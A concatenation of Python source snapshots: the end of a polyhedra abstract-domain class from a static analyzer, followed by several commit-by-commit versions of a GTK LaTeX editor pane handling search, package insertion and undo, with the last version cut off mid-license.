expr = PyMPQIntervalCoeff(PyMPQInterval.top())
return PyTexpr1.cst(environment, expr)
elif isinstance(expression, UnaryArithmeticOperation):
usub = expression.operator == UnaryArithmeticOperation.Operator.Sub
return lyra2apron(environment, expression.expression, usub)
elif isinstance(expression, BinaryArithmeticOperation):
assert not usub
expr1 = lyra2apron(environment, expression.left)
expr2 = lyra2apron(environment, expression.right)
op2op = {
BinaryArithmeticOperation.Operator.Add: TexprOp.AP_TEXPR_ADD,
BinaryArithmeticOperation.Operator.Sub: TexprOp.AP_TEXPR_SUB,
BinaryArithmeticOperation.Operator.Mult: TexprOp.AP_TEXPR_MUL,
BinaryArithmeticOperation.Operator.Div: TexprOp.AP_TEXPR_DIV
}
op = op2op[expression.operator]
return PyTexpr1.binop(op, expr1, expr2, TexprRtype.AP_RTYPE_REAL, TexprRdir.AP_RDIR_RND)
elif isinstance(expression, BinaryComparisonOperation):
assert not usub
# assert expression.left.typ == expression.right.typ
typ = expression.left.typ
left = expression.left
right = expression.right
sub = BinaryArithmeticOperation.Operator.Sub
if expression.operator == BinaryComparisonOperation.Operator.GtE:
expr = lyra2apron(environment, BinaryArithmeticOperation(typ, left, sub, right))
return PyTcons1.make(expr, ConsTyp.AP_CONS_SUPEQ)
elif expression.operator == BinaryComparisonOperation.Operator.Gt:
expr = lyra2apron(environment, BinaryArithmeticOperation(typ, left, sub, right))
return PyTcons1.make(expr, ConsTyp.AP_CONS_SUP)
elif expression.operator == BinaryComparisonOperation.Operator.LtE:
expr = lyra2apron(environment, BinaryArithmeticOperation(typ, right, sub, left))
return PyTcons1.make(expr, ConsTyp.AP_CONS_SUPEQ)
elif expression.operator == BinaryComparisonOperation.Operator.Lt:
expr = lyra2apron(environment, BinaryArithmeticOperation(typ, right, sub, left))
return PyTcons1.make(expr, ConsTyp.AP_CONS_SUP)
raise NotImplementedError(f"lyra2apron conversion for {expression} is not yet supported!")
class PolyhedraState(State):
"""Polyhedra analysis state. An element of the polyhedra abstract domain.
Conjunction of linear constraints constraining the value of each variable.
The value of all program variables is unconstrained by default.
.. note:: Program variables storing collections are abstracted via summarization.
.. document private methods
.. automethod:: PolyhedraState._assign
.. automethod:: PolyhedraState._assume
.. automethod:: PolyhedraState._output
.. automethod:: PolyhedraState._substitute
"""
def __init__(self, variables: Set[VariableIdentifier], precursory: State = None):
super().__init__(precursory=precursory)
r_vars = list()
for variable in variables:
r_vars.append(PyVar(variable.name))
self.environment = PyEnvironment([], r_vars)
self.polka = PyPolkaMPQstrict(self.environment)
@copy_docstring(State.bottom)
def bottom(self):
self.polka = PyPolkaMPQstrict.bottom(self.environment)
return self
@copy_docstring(State.top)
def top(self):
self.polka = PyPolkaMPQstrict.top(self.environment)
return self
def __repr__(self):
if self.is_bottom():
return "⊥"
return '{}'.format(self.polka)
@copy_docstring(State.is_bottom)
def is_bottom(self) -> bool:
return self.polka.is_bottom()
@copy_docstring(State.is_top)
def is_top(self) -> bool:
return self.polka.is_top()
@copy_docstring(State._less_equal)
def _less_equal(self, other: 'PolyhedraState') -> bool:
return self.polka <= other.polka
@copy_docstring(State._join)
def _join(self, other: 'PolyhedraState') -> 'PolyhedraState':
self.polka = self.polka.join(other.polka)
return self
@copy_docstring(State._meet)
def _meet(self, other: 'PolyhedraState') -> 'PolyhedraState':
self.polka = self.polka.meet(other.polka)
return self
@copy_docstring(State._widening)
def _widening(self, other: 'PolyhedraState') -> 'PolyhedraState':
self.polka = self.polka.widening(other.polka)
return self
@copy_docstring(State._assign)
def _assign(self, left: Expression, right: Expression) -> 'PolyhedraState':
if isinstance(left, VariableIdentifier):
expr = lyra2apron(self.environment, right)
self.polka = self.polka.assign(PyVar(left.name), expr)
return self
raise NotImplementedError(f"Assignment to {left.__class__.__name__} is unsupported!")
@copy_docstring(State._assume)
def _assume(self, condition: Expression, bwd: bool = False) -> 'PolyhedraState':
normal = NegationFreeExpression().visit(condition)
if isinstance(normal, BinaryBooleanOperation):
if normal.operator == BinaryBooleanOperation.Operator.And:
right = deepcopy(self)._assume(normal.right, bwd=bwd)
return self._assume(normal.left, bwd=bwd).meet(right)
if normal.operator == BinaryBooleanOperation.Operator.Or:
right = deepcopy(self)._assume(normal.right, bwd=bwd)
return self._assume(normal.left, bwd=bwd).join(right)
elif isinstance(normal, BinaryComparisonOperation):
cond = lyra2apron(self.environment, normal)
self.polka = self.polka.meet(PyTcons1Array([cond]))
return self
raise NotImplementedError(f"Assumption of {normal.__class__.__name__} is unsupported!")
@copy_docstring(State.enter_if)
def enter_if(self) -> 'PolyhedraState':
return self # nothing to be done
@copy_docstring(State.exit_if)
def exit_if(self) -> 'PolyhedraState':
return self # nothing to be done
@copy_docstring(State.enter_loop)
def enter_loop(self) -> 'PolyhedraState':
return self # nothing to be done
@copy_docstring(State.exit_loop)
def exit_loop(self) -> 'PolyhedraState':
return self # nothing to be done
@copy_docstring(State.output)
def _output(self, output: Expression) -> 'PolyhedraState':
return self # nothing to be done
@copy_docstring(State._substitute)
def _substitute(self, left: Expression, right: Expression) -> 'PolyhedraState':
if isinstance(left, VariableIdentifier):
expr = lyra2apron(self.environment, right)
self.polka = self.polka.substitute(PyVar(left.name), expr)
return self
raise NotImplementedError(f"Substitution of {left.__class__.__name__} is unsupported!")
|
#!/usr/bin/python
# -*- encoding: utf-8 -*-
# Copyright (c) 2009 Alexander van der Mey <alexvandermey@gmail.com>
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import gtk
import pango
import locale
import gtksourceview2
from datetime import datetime
import Formatting
START = "START"
END = "END"
CURRENT = "CURRENT"
BEGIN = "\\begin{document}"
PACKAGES = "\\usepackage{"
class TexPane:
def __init__(self, config):
self.editorbuffer = gtksourceview2.Buffer()
self.editortags = self.editorbuffer.get_tag_table()
self.manager = gtksourceview2.LanguageManager()
self.searchresults = []
self.errortag = gtk.TextTag()
self.searchtag = gtk.TextTag()
self.configure_texpane(config)
self.textchange = datetime.now()
self.prevchange = datetime.now()
self.check_buffer_changed()
self.editorviewer.connect("key-press-event", self.set_buffer_changed,)
self.editorbuffer.set_modified(False)
def configure_texpane(self, config):
"""Configures the gtksourceview (editor) widget"""
self.language = self.manager.get_language("latex")
self.editorbuffer.set_language(self.language)
self.editorbuffer.set_highlight_matching_brackets(True)
self.editorbuffer.set_highlight_syntax(True)
self.editorviewer = gtksourceview2.View(self.editorbuffer)
self.editorviewer.modify_font(pango.FontDescription("monospace 10"))
self.editorviewer.set_show_line_numbers(config.get_bool("tex_linenumbers"))
self.editorviewer.set_highlight_current_line(config.get_bool("tex_highlighting"))
textwrap = config.get_bool("tex_textwrapping")
wordwrap = config.get_bool("tex_wordwrapping")
self.editorviewer.set_wrap_mode(self.grab_wrapmode(textwrap, wordwrap))
self.errortag.set_property('background', 'red')
self.errortag.set_property('foreground', 'white')
self.searchtag.set_property('background', 'yellow')
def fill_buffer(self, newcontent):
"""Clears the buffer and writes new not-undoable data into it"""
self.editorbuffer.begin_user_action()
self.editorbuffer.set_text("")
self.editorbuffer.begin_not_undoable_action()
start = self.editorbuffer.get_start_iter()
self.editorviewer.set_sensitive(False)
self.editorbuffer.insert(start, newcontent)
self.editorbuffer.set_modified(False)
self.editorviewer.set_sensitive(True)
self.editorbuffer.end_not_undoable_action()
self.editorbuffer.end_user_action()
def grab_buffer(self):
"""Grabs content of the buffer and returns it for writing to file."""
buff = self.editorviewer.get_buffer()
self.editorviewer.set_sensitive(False)
start = self.get_iterator(START)
end = self.get_iterator(END)
content = buff.get_text(start, end)
self.editorviewer.set_sensitive(True)
buff.set_modified(False)
return content
def decode_text(self, filename):
loadfile = open(filename, "r")
content = loadfile.read()
encoding = locale.getdefaultlocale()[1]
try: decoded_content = content.decode(encoding)
except (UnicodeError, TypeError):
try: decoded_content = content.decode("iso-8859-1", 'replace')
except (UnicodeError, TypeError):
decoded_content = content.decode("ascii", 'replace')
loadfile.close()
return decoded_content
def encode_text(self, text):
encoding = locale.getdefaultlocale()[1]
try: encoded_content = text.encode(encoding)
except (UnicodeError, TypeError):
try: encoded_content = text.encode("iso-8859-1", 'replace')
except (UnicodeError, TypeError):
encoded_content = text.encode("ascii", 'replace')
return encoded_content
def get_iterator(self, tag, search=1):
"""Returns a buffer iterator object for a known position in the buffer
or a custom searchstring. The optional argument search determines
whether iter is placed in front or after the find result"""
if tag == "START":
bufferiter = self.editorbuffer.get_start_iter()
elif tag == "END":
bufferiter = self.editorbuffer.get_end_iter()
elif tag == "CURRENT":
bufferiter = self.editorbuffer.get_iter_at_mark(self.editorbuffer.get_insert())
else:
if search == 0:
enditer = self.editorbuffer.get_end_iter()
bufferiter = gtksourceview2.iter_backward_search \
(enditer, tag, flags=0, limit=None)[0]
else:
startiter = self.editorbuffer.get_start_iter()
bufferiter = gtksourceview2.iter_forward_search \
(startiter, tag, flags=0, limit=None)[0]
return bufferiter
def insert_package(self, package):
start_iter = self.get_iterator(START)
end_iter = self.get_iterator(BEGIN, 1)
pkgsearchstr = "{" + package + "}"
pkginsertstr = "\\usepackage{" + package + "}\n"
if gtksourceview2.iter_forward_search \
(start_iter, pkgsearchstr, flags=0, limit=end_iter):
return
else:
self.editorbuffer.begin_not_undoable_action()
self.editorbuffer.insert(end_iter, pkginsertstr)
self.editorbuffer.end_not_undoable_action()
self.set_buffer_changed()
def insert_bib(self, package):
start_iter = self.get_iterator(BEGIN)
end_iter = self.get_iterator("\\end{document}", 0)
searchstr = "\\bibliography{"
insertstr = "\\bibliography{" + package + "}{}\n"
stylestr = "\\bibliographystyle{plain}\n"
if gtksourceview2.iter_forward_search(start_iter, searchstr, flags=0, limit=end_iter):
return
else:
self.editorbuffer.begin_not_undoable_action()
self.editorbuffer.insert(end_iter, insertstr + stylestr)
self.editorbuffer.end_not_undoable_action()
self.set_buffer_changed()
def set_selection_textstyle(self, widget):
Formatting.Formatting(widget, self.editorbuffer)
self.set_buffer_changed()
def apply_errortags(self, errorline):
try: #remove the tag from the table if it is in there
self.editortags.remove(self.errortag)
except ValueError: pass
if errorline is not None: #re-add the tag if an error was found
self.editortags.add(self.errortag)
start = self.editorbuffer.get_iter_at_line(errorline-1)
end = self.editorbuffer.get_iter_at_line(errorline)
self.editorbuffer.apply_tag(self.errortag, start, end)
# TODO merge function with apply_errortags (multiple error results soon)
def apply_searchtags(self, searchresults):
try:
self.editortags.remove(self.searchtag)
except ValueError: pass
self.editortags.add(self.searchtag)
for result in searchresults:
self.editorbuffer.apply_tag(self.searchtag, result[0], result[1])
def start_search(self, term, backwards, matchcase=0):
if matchcase is False:
matchcase = (gtksourceview2.SEARCH_CASE_INSENSITIVE)
if backwards is True:
self.searchresults = self.search_buffer_backward(term, matchcase)
else:
self.searchresults = self.search_buffer_forward(term, matchcase)
self.apply_searchtags(self.searchresults)
ins, bound = self.searchresults[0]
self.editorbuffer.place_cursor(ins)
#self.editorbuffer.select_range(ins, bound)
self.editorviewer.scroll_to_iter(ins, 0)
def search_buffer_forward(self, term, matchcase):
result_list = []
begin = self.get_iterator(CURRENT)
while True:
result = gtksourceview2.iter_forward_search \
(begin, term, matchcase, limit=None)
if result:
result_list.append((result[0], result[1]))
begin = result[1]
else:
break
return result_list
def search_buffer_backward(self, term, matchcase):
result_list = []
begin = self.get_iterator(CURRENT)
while True:
result = gtksourceview2.iter_backward_search \
(begin, term, matchcase, limit=None)
if result:
result_list.append((result[0], result[1]))
begin = result[1]
else:
break
return result_list
def grab_wrapmode(self, textwrap, wordwrap):
if textwrap is False:
return gtk.WRAP_NONE
if wordwrap is True:
return gtk.WRAP_WORD
else:
return gtk.WRAP_CHAR
def set_buffer_changed(self, *args):
self.textchange = datetime.now()
def check_buffer_changed(self):
if self.prevchange != self.textchange:
self.prevchange = self.textchange
return True
else:
return False
def undo_change(self):
if self.editorviewer.get_buffer().can_undo():
self.editorviewer.get_buffer().undo()
self.set_buffer_changed()
def redo_change(self):
if self.editorviewer.get_buffer().can_redo():
self.editorviewer.get_buffer().redo()
self.set_buffer_changed()
fixed backward search loop and added no result contraints
#!/usr/bin/python
# -*- encoding: utf-8 -*-
# Copyright (c) 2009 Alexander van der Mey <alexvandermey@gmail.com>
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import gtk
import pango
import locale
import gtksourceview2
from datetime import datetime
import Formatting
START = "START"
END = "END"
CURRENT = "CURRENT"
BEGIN = "\\begin{document}"
PACKAGES = "\\usepackage{"
class TexPane:
def __init__(self, config):
self.editorbuffer = gtksourceview2.Buffer()
self.editortags = self.editorbuffer.get_tag_table()
self.manager = gtksourceview2.LanguageManager()
self.searchresults = []
self.errortag = gtk.TextTag()
self.searchtag = gtk.TextTag()
self.configure_texpane(config)
self.textchange = datetime.now()
self.prevchange = datetime.now()
self.check_buffer_changed()
self.editorviewer.connect("key-press-event", self.set_buffer_changed,)
self.editorbuffer.set_modified(False)
def configure_texpane(self, config):
"""Configures the gtksourceview (editor) widget"""
self.language = self.manager.get_language("latex")
self.editorbuffer.set_language(self.language)
self.editorbuffer.set_highlight_matching_brackets(True)
self.editorbuffer.set_highlight_syntax(True)
self.editorviewer = gtksourceview2.View(self.editorbuffer)
self.editorviewer.modify_font(pango.FontDescription("monospace 10"))
self.editorviewer.set_show_line_numbers(config.get_bool("tex_linenumbers"))
self.editorviewer.set_highlight_current_line(config.get_bool("tex_highlighting"))
textwrap = config.get_bool("tex_textwrapping")
wordwrap = config.get_bool("tex_wordwrapping")
self.editorviewer.set_wrap_mode(self.grab_wrapmode(textwrap, wordwrap))
self.errortag.set_property('background', 'red')
self.errortag.set_property('foreground', 'white')
self.searchtag.set_property('background', 'yellow')
def fill_buffer(self, newcontent):
"""Clears the buffer and writes new not-undoable data into it"""
self.editorbuffer.begin_user_action()
self.editorbuffer.set_text("")
self.editorbuffer.begin_not_undoable_action()
start = self.editorbuffer.get_start_iter()
self.editorviewer.set_sensitive(False)
self.editorbuffer.insert(start, newcontent)
self.editorbuffer.set_modified(False)
self.editorviewer.set_sensitive(True)
self.editorbuffer.end_not_undoable_action()
self.editorbuffer.end_user_action()
def grab_buffer(self):
"""Grabs content of the buffer and returns it for writing to file."""
buff = self.editorviewer.get_buffer()
self.editorviewer.set_sensitive(False)
start = self.get_iterator(START)
end = self.get_iterator(END)
content = buff.get_text(start, end)
self.editorviewer.set_sensitive(True)
buff.set_modified(False)
return content
def decode_text(self, filename):
loadfile = open(filename, "r")
content = loadfile.read()
encoding = locale.getdefaultlocale()[1]
try: decoded_content = content.decode(encoding)
except (UnicodeError, TypeError):
try: decoded_content = content.decode("iso-8859-1", 'replace')
except (UnicodeError, TypeError):
decoded_content = content.decode("ascii", 'replace')
loadfile.close()
return decoded_content
def encode_text(self, text):
encoding = locale.getdefaultlocale()[1]
try: encoded_content = text.encode(encoding)
except (UnicodeError, TypeError):
try: encoded_content = text.encode("iso-8859-1", 'replace')
except (UnicodeError, TypeError):
encoded_content = text.encode("ascii", 'replace')
return encoded_content
def get_iterator(self, tag, search=1):
"""Returns a buffer iterator object for a known position in the buffer
or a custom searchstring. The optional argument search determines
whether iter is placed in front or after the find result"""
if tag == "START":
bufferiter = self.editorbuffer.get_start_iter()
elif tag == "END":
bufferiter = self.editorbuffer.get_end_iter()
elif tag == "CURRENT":
bufferiter = self.editorbuffer.get_iter_at_mark(self.editorbuffer.get_insert())
else:
if search == 0:
enditer = self.editorbuffer.get_end_iter()
bufferiter = gtksourceview2.iter_backward_search \
(enditer, tag, flags=0, limit=None)[0]
else:
startiter = self.editorbuffer.get_start_iter()
bufferiter = gtksourceview2.iter_forward_search \
(startiter, tag, flags=0, limit=None)[0]
return bufferiter
def insert_package(self, package):
start_iter = self.get_iterator(START)
end_iter = self.get_iterator(BEGIN, 1)
pkgsearchstr = "{" + package + "}"
pkginsertstr = "\\usepackage{" + package + "}\n"
if gtksourceview2.iter_forward_search \
(start_iter, pkgsearchstr, flags=0, limit=end_iter):
return
else:
self.editorbuffer.begin_not_undoable_action()
self.editorbuffer.insert(end_iter, pkginsertstr)
self.editorbuffer.end_not_undoable_action()
self.set_buffer_changed()
def insert_bib(self, package):
start_iter = self.get_iterator(BEGIN)
end_iter = self.get_iterator("\\end{document}", 0)
searchstr = "\\bibliography{"
insertstr = "\\bibliography{" + package + "}{}\n"
stylestr = "\\bibliographystyle{plain}\n"
if gtksourceview2.iter_forward_search(start_iter, searchstr, flags=0, limit=end_iter):
return
else:
self.editorbuffer.begin_not_undoable_action()
self.editorbuffer.insert(end_iter, insertstr + stylestr)
self.editorbuffer.end_not_undoable_action()
self.set_buffer_changed()
def set_selection_textstyle(self, widget):
Formatting.Formatting(widget, self.editorbuffer)
self.set_buffer_changed()
def apply_errortags(self, errorline):
try: #remove the tag from the table if it is in there
self.editortags.remove(self.errortag)
except ValueError: pass
if errorline is not None: #re-add the tag if an error was found
self.editortags.add(self.errortag)
start = self.editorbuffer.get_iter_at_line(errorline-1)
end = self.editorbuffer.get_iter_at_line(errorline)
self.editorbuffer.apply_tag(self.errortag, start, end)
# TODO merge function with apply_errortags (multiple error results soon)
def apply_searchtags(self, searchresults):
try:
self.editortags.remove(self.searchtag)
except ValueError: pass
self.editortags.add(self.searchtag)
for result in searchresults:
self.editorbuffer.apply_tag(self.searchtag, result[0], result[1])
def start_search(self, term, backwards, matchcase=0):
self.searchresults = []
if matchcase is False:
matchcase = (gtksourceview2.SEARCH_CASE_INSENSITIVE)
if backwards is True:
self.searchresults = self.search_buffer_backward(term, matchcase)
else:
self.searchresults = self.search_buffer_forward(term, matchcase)
self.apply_searchtags(self.searchresults)
try:
ins, bound = self.searchresults[0]
self.editorbuffer.place_cursor(ins)
#self.editorbuffer.select_range(ins, bound)
self.editorviewer.scroll_to_iter(ins, 0)
except IndexError: pass #no searchresults
def search_buffer_forward(self, term, matchcase):
result_list = []
begin = self.get_iterator(CURRENT)
while True:
result = gtksourceview2.iter_forward_search \
(begin, term, matchcase, limit=None)
if result:
result_list.append((result[0], result[1]))
begin = result[1]
else:
break
return result_list
def search_buffer_backward(self, term, matchcase):
result_list = []
begin = self.get_iterator(CURRENT)
while True:
result = gtksourceview2.iter_backward_search \
(begin, term, matchcase, limit=None)
if result:
result_list.append((result[0], result[1]))
begin = result[0]
else:
break
return result_list
def grab_wrapmode(self, textwrap, wordwrap):
if textwrap is False:
return gtk.WRAP_NONE
if wordwrap is True:
return gtk.WRAP_WORD
else:
return gtk.WRAP_CHAR
def set_buffer_changed(self, *args):
self.textchange = datetime.now()
def check_buffer_changed(self):
if self.prevchange != self.textchange:
self.prevchange = self.textchange
return True
else:
return False
def undo_change(self):
if self.editorviewer.get_buffer().can_undo():
self.editorviewer.get_buffer().undo()
self.set_buffer_changed()
def redo_change(self):
if self.editorviewer.get_buffer().can_redo():
self.editorviewer.get_buffer().redo()
self.set_buffer_changed()
|
#!/usr/bin/python
# -*- encoding: utf-8 -*-
# Copyright (c) 2009 Alexander van der Mey <alexvandermey@gmail.com>
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import gtk
import pango
import locale
import gtksourceview2
from datetime import datetime
import Formatting
START = "START"
END = "END"
CURRENT = "CURRENT"
BEGIN = "\\begin{document}"
PACKAGES = "\\usepackage{"
class TexPane:
def __init__(self, config):
self.editorbuffer = gtksourceview2.Buffer()
self.editortags = self.editorbuffer.get_tag_table()
self.manager = gtksourceview2.LanguageManager()
self.searchresults = []
self.searchposition = None
self.errortag = gtk.TextTag()
self.searchtag = gtk.TextTag()
self.configure_texpane(config)
self.textchange = datetime.now()
self.prevchange = datetime.now()
self.check_buffer_changed()
self.editorviewer.connect("key-press-event", self.set_buffer_changed,)
self.editorbuffer.set_modified(False)
def configure_texpane(self, config):
"""Configures the gtksourceview (editor) widget"""
self.language = self.manager.get_language("latex")
self.editorbuffer.set_language(self.language)
self.editorbuffer.set_highlight_matching_brackets(True)
self.editorbuffer.set_highlight_syntax(True)
self.editorviewer = gtksourceview2.View(self.editorbuffer)
self.editorviewer.modify_font \
(pango.FontDescription(config.get_value("editor", "font")))
self.editorviewer.set_show_line_numbers( \
bool(config.get_value("view", "line_numbers")))
self.editorviewer.set_highlight_current_line( \
bool(config.get_value("view", "highlighting")))
textwrap = config.get_value("view", "textwrapping")
wordwrap = config.get_value("view", "wordwrapping")
mode = self.grab_wrapmode(textwrap, wordwrap)
self.editorviewer.set_wrap_mode(mode)
self.errortag.set_property('background', 'red')
self.errortag.set_property('foreground', 'white')
self.searchtag.set_property('background', 'yellow')
def fill_buffer(self, newcontent):
"""Clears the buffer and writes new not-undoable data into it"""
self.editorbuffer.begin_user_action()
self.editorbuffer.set_text("")
self.editorbuffer.begin_not_undoable_action()
start = self.editorbuffer.get_start_iter()
self.editorviewer.set_sensitive(False)
self.editorbuffer.insert(start, newcontent)
self.editorbuffer.set_modified(False)
self.editorviewer.set_sensitive(True)
self.editorbuffer.end_not_undoable_action()
self.editorbuffer.end_user_action()
def grab_buffer(self):
"""Grabs content of the buffer and returns it for writing to file."""
buff = self.editorviewer.get_buffer()
self.editorviewer.set_sensitive(False)
start = self.get_iterator(START)
end = self.get_iterator(END)
content = buff.get_text(start, end)
self.editorviewer.set_sensitive(True)
buff.set_modified(False)
return content
def decode_text(self, filename):
loadfile = open(filename, "r")
content = loadfile.read()
encoding = locale.getdefaultlocale()[1]
try: decoded_content = content.decode(encoding)
except (UnicodeError, TypeError):
try: decoded_content = content.decode("iso-8859-1", 'replace')
except (UnicodeError, TypeError):
decoded_content = content.decode("ascii", 'replace')
loadfile.close()
return decoded_content
def encode_text(self, text):
encoding = locale.getdefaultlocale()[1]
try: encoded_content = text.encode(encoding)
except (UnicodeError, TypeError):
try: encoded_content = text.encode("iso-8859-1", 'replace')
except (UnicodeError, TypeError):
encoded_content = text.encode("ascii", 'replace')
return encoded_content
def get_iterator(self, tag, search=1):
"""Returns a buffer iterator object for a known position in the buffer
or a custom searchstring. The optional argument search determines
whether iter is placed in front or after the find result"""
if tag == "START":
bufferiter = self.editorbuffer.get_start_iter()
elif tag == "END":
bufferiter = self.editorbuffer.get_end_iter()
elif tag == "CURRENT":
bufferiter = self.editorbuffer.get_iter_at_mark(self.editorbuffer.get_insert())
else:
if search == 0:
enditer = self.editorbuffer.get_end_iter()
bufferiter = gtksourceview2.iter_backward_search \
(enditer, tag, flags=0, limit=None)[0]
else:
startiter = self.editorbuffer.get_start_iter()
bufferiter = gtksourceview2.iter_forward_search \
(startiter, tag, flags=0, limit=None)[0]
return bufferiter
def insert_package(self, package):
start_iter = self.get_iterator(START)
end_iter = self.get_iterator(BEGIN, 1)
pkgsearchstr = "{" + package + "}"
pkginsertstr = "\\usepackage{" + package + "}\n"
if gtksourceview2.iter_forward_search \
(start_iter, pkgsearchstr, flags=0, limit=end_iter):
return
else:
self.editorbuffer.begin_not_undoable_action()
self.editorbuffer.insert(end_iter, pkginsertstr)
self.editorbuffer.end_not_undoable_action()
self.set_buffer_changed()
def insert_bib(self, package):
start_iter = self.get_iterator(BEGIN)
end_iter = self.get_iterator("\\end{document}", 0)
searchstr = "\\bibliography{"
insertstr = "\\bibliography{" + package + "}{}\n"
stylestr = "\\bibliographystyle{plain}\n"
if gtksourceview2.iter_forward_search(start_iter, searchstr, flags=0, limit=end_iter):
return
else:
self.editorbuffer.begin_not_undoable_action()
self.editorbuffer.insert(end_iter, insertstr + stylestr)
self.editorbuffer.end_not_undoable_action()
self.set_buffer_changed()
def set_selection_textstyle(self, widget):
Formatting.Formatting(widget, self.editorbuffer)
self.set_buffer_changed()
def apply_errortags(self, errorline):
try: #remove the tag from the table if it is in there
self.editortags.remove(self.errortag)
except ValueError: pass
if errorline is not None: #re-add the tag if an error was found
self.editortags.add(self.errortag)
start = self.editorbuffer.get_iter_at_line(errorline-1)
end = self.editorbuffer.get_iter_at_line(errorline)
self.editorbuffer.apply_tag(self.errortag, start, end)
# TODO merge function with apply_errortags (multiple error results soon)
def apply_searchtags(self, searchresults):
try:
self.searchresultiters = []
self.searchposition = 0
self.editortags.remove(self.searchtag)
except ValueError: pass
self.editortags.add(self.searchtag)
for result in searchresults:
self.searchresultiters.append(result)
self.editorbuffer.apply_tag(self.searchtag, result[0], result[1])
def jumpto_searchresult(self, direction):
try:
if self.searchposition + direction < 0:
return False
ins, bnd = self.searchresultiters[self.searchposition + direction]
self.editorbuffer.place_cursor(ins)
self.searchposition = self.searchposition + direction
except (IndexError, TypeError): pass
def start_search(self, term, backwards, wholeword, matchcase=0):
self.searchresults = []
if matchcase is False:
matchcase = (gtksourceview2.SEARCH_CASE_INSENSITIVE)
if backwards is True:
self.searchresults = self.search_buffer_backward(term, wholeword, matchcase)
else:
self.searchresults = self.search_buffer_forward(term, wholeword, matchcase)
self.apply_searchtags(self.searchresults)
try:
ins, bound = self.searchresults[0]
self.editorbuffer.place_cursor(ins)
#self.editorbuffer.select_range(ins, bound)
self.editorviewer.scroll_to_iter(ins, 0)
except IndexError: pass #no searchresults
def search_buffer_forward(self, term, wholeword, matchcase):
result_list = []
position = self.get_iterator(CURRENT)
while True:
result = gtksourceview2.iter_forward_search \
(position, term, matchcase, limit=None)
if result:
ins, bound = result
if not wholeword:
result_list.append((ins, bound))
elif wholeword and ins.starts_word() and bound.ends_word():
result_list.append((ins, bound))
else: pass
position = bound
else:
break
return result_list
def search_buffer_backward(self, term, wholeword, matchcase):
result_list = []
position = self.get_iterator(CURRENT)
while True:
result = gtksourceview2.iter_backward_search \
(position, term, matchcase, limit=None)
if result:
ins, bound = result
if not wholeword:
result_list.append((ins, bound))
elif wholeword and ins.starts_word() and bound.ends_word():
result_list.append((ins, bound))
else: pass
position = ins
else:
break
return result_list
def grab_wrapmode(self, textwrap, wordwrap):
if textwrap is False:
return gtk.WRAP_NONE
elif wordwrap is True:
return gtk.WRAP_WORD
else:
return gtk.WRAP_CHAR
def set_buffer_changed(self, *args):
self.textchange = datetime.now()
def check_buffer_changed(self):
if self.prevchange != self.textchange:
self.prevchange = self.textchange
return True
else:
return False
def undo_change(self):
if self.editorviewer.get_buffer().can_undo():
self.editorviewer.get_buffer().undo()
self.set_buffer_changed()
def redo_change(self):
if self.editorviewer.get_buffer().can_redo():
self.editorviewer.get_buffer().redo()
self.set_buffer_changed()
temp disable for glib problem
git-svn-id: b62a74e6a85b74e782ead772f54cba8e909798b9@287 6e728def-ac18-4b39-bad8-e7d984b3b6fa
#!/usr/bin/python
# -*- encoding: utf-8 -*-
# Copyright (c) 2009 Alexander van der Mey <alexvandermey@gmail.com>
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
